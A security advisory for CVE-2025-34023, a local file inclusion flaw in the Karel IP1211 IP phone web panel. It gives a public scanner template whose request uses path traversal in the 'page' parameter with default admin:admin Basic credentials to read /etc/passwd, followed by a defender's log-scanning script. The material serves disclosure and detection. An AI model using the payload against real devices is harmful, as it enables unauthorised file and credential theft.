CVE-2025-34023: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion

Date: 2025-08-01 | Affected software: Karel IP Phone IP1211 Web Management Panel | POC: Public

Vulnerability description

Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.

PoC code [public]

id: CVE-2025-34023

info:
  name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
  impact: |
    Attackers can read arbitrary files including sensitive configuration and credential files stored on the device through path traversal in the page parameter.
  remediation: |
    Update Karel IP Phone IP1211 firmware to the latest version that properly validates file paths, or restrict access to the cgiServer.exx endpoint.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100038
    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34023
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-34023
    epss-score: 0.01848
    epss-percentile: 0.8252
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: cve,cve2025,karel,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"

    headers:
      Authorization: Basic YWRtaW46YWRtaW4=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100effa92a7f1c7967d632fefc5097d2f6f44c40781426f1a7db1de5f1837a52985022011d0909b0187bdc9272602a87a587e735dcd3a8c9cc5f81ca989e1f0a3858c2e:922c64590222798bb761d5b6d8e72950
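
For defenders, the following added example (not part of the original template or of any Karel tooling) scans web access logs for requests to `cgiServer.exx` whose `page` parameter contains `..` path segments, including percent-encoded and double-encoded forms. It assumes Combined Log Format lines from a reverse proxy in front of the phone; the sample lines, IP addresses and the `status.htm` page name are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "/cgi-bin/cgiserver.exx"  # endpoint from the advisory, lower-cased
# Assumption: Combined Log Format from a proxy in front of the phone.
REQ_RE = re.compile(
    r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded '../' is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if any path segment of the decoded value is '..'."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def find_suspicious(lines):
    """Return one record per request whose 'page' parameter traverses upward."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if unquote(parts.path).lower() != ENDPOINT:
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == "page" and is_traversal(value):
                hits.append({"src": m["src"], "status": int(m["status"]),
                             "page": fully_decode(value)})
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical page names).
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /cgi-bin/cgiServer.exx?page=status.htm HTTP/1.1" 200 512',
    '198.51.100.7 - admin [01/Aug/2025:10:00:05 +0000] "GET /cgi-bin/cgiServer.exx?page=../../../../etc/passwd HTTP/1.1" 200 1024',
    '198.51.100.7 - admin [01/Aug/2025:10:00:09 +0000] "GET /cgi-bin/cgiServer.exx?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Aug/2025:10:00:12 +0000] "GET /index.html?page=../x HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE):
        print(hit)
```

A flagged request that returned status 200 deserves priority review, since the template's matchers also require a 200 response.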
